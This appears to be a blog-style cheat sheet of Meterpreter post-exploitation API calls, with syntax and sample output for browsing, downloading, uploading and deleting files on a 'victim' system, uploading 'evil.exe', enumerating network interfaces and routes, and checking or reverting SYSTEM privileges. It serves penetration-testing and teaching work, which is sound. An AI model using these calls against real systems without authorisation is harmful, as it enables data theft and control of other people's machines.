This page lists Meterpreter methods with their syntax and output. The aim is to provide a quick reference for Meterpreter script developers.
Rather than reading the code of existing Meterpreter scripts to find the relevant method, this page can serve as a one-stop shop.
Hope this will help newbies and enthusiasts like me who want to start writing their own Meterpreter scripts.
P.S.: Not all the methods are covered, as this is all I can do in 3 hours. More to update soon :)
Get all the files/folders in a directory
Syntax: client.fs.dir.entries
Output: ["AUTOEXEC.BAT", "boot.ini", "CONFIG.SYS", "Documents and Settings"]
Comment: By default it will get the files and directories of the present working directory.
Syntax: client.fs.dir.entries("c:\\")
Output: ["sample_file.txt","dummy_directory","myfile.exe"]
Comment: This will get the files and directories of the C: drive.
Get all the files/folders in a directory along with extra information
Syntax: client.fs.dir.entries_with_info
Output: [{"FileName"=>".", "FilePath"=>"c:\\........ "st_atime"=>0, "st_mtime"=>1329581528}>}]
Comment: By default it will get the files and directories of the present working directory.
Syntax: client.fs.dir.entries_with_info("c:\\")
Output: [{"FileName"=>".", "FilePath"=>"c:\\........ "st_atime"=>0, "st_mtime"=>1329581528}>}]
Comment: This will get the files and directories of the C: drive.
Change the directory
Syntax: client.fs.dir.chdir("c:\\")
Output: 0
Comment: This will change the present working directory to the C: drive.
Make directory
Syntax: client.fs.dir.mkdir("c:\\oldman")
Output: 0
Comment: This will make a directory named "oldman" on the C: drive.
Get current working directory
Syntax: client.fs.dir.pwd
Output: "c:\\oldmanlab"
Comment: This will give the current working directory name
Syntax: client.fs.dir.getwd
Output: "c:\\oldmanlab"
Comment: This will give the current working directory name
Delete a directory
Syntax: client.fs.dir.delete("c:\\oldman")
Output: 0
Comment: This will delete the specified directory only if empty.
Syntax: client.fs.dir.rmdir("c:\\oldman")
Output: 0
Comment: This will delete the specified directory only if empty.
Syntax: client.fs.dir.unlink("c:\\oldman")
Output: 0
Comment: This will delete the specified directory only if empty.
Download contents of a target directory
Syntax: client.fs.dir.download("/root/oldmanlab/","c:\\oldman")
Output: [".", "..", "firefox.lnk", "my_file.txt"]
Comment: This will download all the files inside the oldman directory on the victim and save them inside the oldmanlab directory on the attacker's system.
Upload contents of a local directory to victim system
Syntax: client.fs.dir.upload("c:\\oldman","/root/oldmanlab")
Output: [".", "..", "firefox.lnk", "my_file.txt"]
Comment: This will upload all the content inside the oldmanlab directory on the attacker's system to the oldman directory on the victim system.
Get the file separator
Syntax: client.fs.file.separator
Output: \\
Comment: This will give the file separator used by the system (\\ for Windows, / for Unix).
Search for the specified file
Syntax: client.fs.file.search("c:\\oldman","hacking.txt")
Output: [{"path"=>"c:\\oldman\\lab", "name"=>"hacking.txt", "size"=>4}]
Comment: This will search for hacking.txt in the oldman directory and its subdirectories
Get the basename for the specified file
Syntax: client.fs.file.basename("c:\\oldman\\hacking.txt")
Output: hacking.txt
Comment: This will give the filename of the filepath specified.
Expand path of the directory
Syntax: client.fs.file.expand_path("%TEMP%")
Output: "C:\\WINDOWS\\TEMP"
Comment: This will expand the specified environment variable to its absolute path.
Get the md5 of file
Syntax: client.fs.file.md5("c:\\oldman\\file.txt")
Output: "\x12,\x17~Fj\xFEq\xB7?'\x01;f\x7F'"
Comment: This will give the md5 sum of the specified file
Get the sha1 of file
Syntax: client.fs.file.sha1("c:\\oldman\\file.txt")
Output: "Q\xD0\b\xFF\xFA\xD8\xF4x7_\xAE\x911\xB4\xE12V\xB8\tw"
Comment: This will give the sha1 of the specified file
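Both digest calls above return the raw digest bytes rather than the usual hex string, so comparing the result with a recorded checksum needs an encoding step. The following is an added example, not part of the original page: plain Ruby that runs without a Meterpreter session, where the helper names `digest_info`, `digest_matches?` and `copy_intact?` are hypothetical and the two byte strings are the outputs shown in the entries above.

```ruby
require 'digest'

# Raw digest lengths in bytes for the two algorithms covered above.
DIGEST_LENGTHS = { 16 => :md5, 20 => :sha1 }.freeze

# Outputs copied from the md5 and sha1 entries above (raw bytes, not hex).
PAGE_MD5  = "\x12,\x17~Fj\xFEq\xB7?'\x01;f\x7F'".b
PAGE_SHA1 = "Q\xD0\b\xFF\xFA\xD8\xF4x7_\xAE\x911\xB4\xE12V\xB8\tw".b

# Hypothetical helper: identify a raw digest by its length and hex-encode it.
def digest_info(raw)
  raw = raw.b
  algo = DIGEST_LENGTHS[raw.bytesize]
  raise ArgumentError, "unexpected digest length #{raw.bytesize}" unless algo
  { algo: algo, hex: raw.unpack1('H*') }
end

# Hypothetical helper: compare a raw digest with a hex checksum taken from a
# report or hash list. Tolerates upper case and surrounding whitespace.
def digest_matches?(raw, expected_hex)
  expected = expected_hex.strip.downcase
  return false unless expected.match?(/\A\h+\z/)
  digest_info(raw)[:hex] == expected
end

# Hypothetical helper: check that a local copy of a file still matches the
# raw digest recorded for the original before it was transferred.
def copy_intact?(local_path, raw)
  klass = { md5: Digest::MD5, sha1: Digest::SHA1 }.fetch(digest_info(raw)[:algo])
  klass.file(local_path).digest == raw.b
end

if $PROGRAM_NAME == __FILE__
  puts "md5:  #{digest_info(PAGE_MD5)[:hex]}"
  puts "sha1: #{digest_info(PAGE_SHA1)[:hex]}"
end
```
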
Check if specified file exists
Syntax: client.fs.file.exists?("c:\\oldman\\file.txt")
Output: true
Comment: This will return true if file exists else false
Delete specified file
Syntax: client.fs.file.rm("c:\\oldman\\file.txt")
Output: Rex::Post::Meterpreter::Packet type=Response....meta=INT value=0
Comment: This will delete the specified file.
Syntax: client.fs.file.unlink("c:\\oldman\\file.txt")
Output: Rex::Post::Meterpreter::Packet type=Response....meta=INT value=0
Comment: This will delete the specified file.
Upload file to victim's system
Syntax: client.fs.file.upload("c:\\oldman","/root/lab/evil.exe")
Output: ["/root/lab/firefox.lnk"]
Comment: This will upload evil.exe from the attacker's system to the victim's oldman directory.
Download file from victim's system
Syntax: client.fs.file.download("/root/lab/secret.exe","c:\\oldman\\secret.exe")
Output: ["c:\\oldman\\secret.exe"]
Comment: This will download secret.exe from the victim's system and save it to the attacker's root directory.
Open a file in read mode and copy the content to some variable
Syntax: file1 = client.fs.file.new("c:\\oldman\\my_file.txt")
temp = ""
# read until end of file, appending each chunk to temp
until file1.eof?
  temp << file1.read
end
file1.close
Output: N.A
Comment: This will copy all the data inside my_file.txt and store it in temp variable
List all the available interfaces on the victim's system
Syntax: client.net.config.get_interfaces
Output: [......]
Comment: This will return an array of all the interfaces available on the victim's system along with details like IP, netmask, mac_address, etc.
Syntax: client.net.config.get_interfaces[0]
Output: [......]
Comment: This will return the first interface available on the victim's system along with details like IP, netmask, mac_address, etc.
Get the IP address of specified interface
Syntax: client.net.config.get_interfaces[1].ip
Output: 192.168.7.3
Comment: This will give IP address of the second interface in the list.
List all the routes available on the victim's system
Syntax: client.net.config.get_routes
Output:
Comment: This will return an array of all the routes available on the victim's system along with details like subnet, netmask, gateway.
Syntax: client.net.config.get_routes[0]
Output:
Comment: This will return the first route available on the victim's system along with details like subnet, netmask, gateway.
Add a route on the victim's system
Syntax: client.net.config.add_route("x.x.x.x","x.x.x.x","x.x.x.x")
Output: true
Comment: This will add a route on the victim's system. The first parameter is the subnet, the second is the netmask and the third is the gateway.
Remove specified route from the victim's system
Syntax: client.net.config.remove_route("x.x.x.x","x.x.x.x","x.x.x.x")
Output: true
Comment: This will remove a route from the victim's system. The first parameter is the subnet, the second is the netmask and the third is the gateway.
Get the user id
Syntax: client.sys.config.getuid
Output: "NT AUTHORITY\\SYSTEM"
Comment: This will give the user id of the victim system. It basically shows our access level.
Get the victim's computer name
Syntax: client.sys.config.sysinfo["Computer"]
Output: "WINXP-1337"
Comment: This will give the computer name of the compromised system.
Get the victim's operating system name and version
Syntax: client.sys.config.sysinfo["OS"]
Output: "Windows XP (Build 2600, Service Pack 2)."
Comment: This will give the name of the operating system running on the compromised system.
Get the victim's operating system architecture
Syntax: client.sys.config.sysinfo["Architecture"]
Output: "x86"
Comment: This will give the architecture (x86, 64-bit) of the operating system running on the compromised system.
Get the victim's operating system language
Syntax: client.sys.config.sysinfo["System Language"]
Output: "en_US"
Comment: This will give the operating system language of the compromised system.
Revert to previous user privileges
Syntax: client.sys.config.revert_to_self
Output: N.A
Comment: Let's say we had changed privileges from "NT AUTHORITY\\oldmanlab" to "NT AUTHORITY\\SYSTEM"; then revert_to_self will change our privileges back to "NT AUTHORITY\\oldmanlab".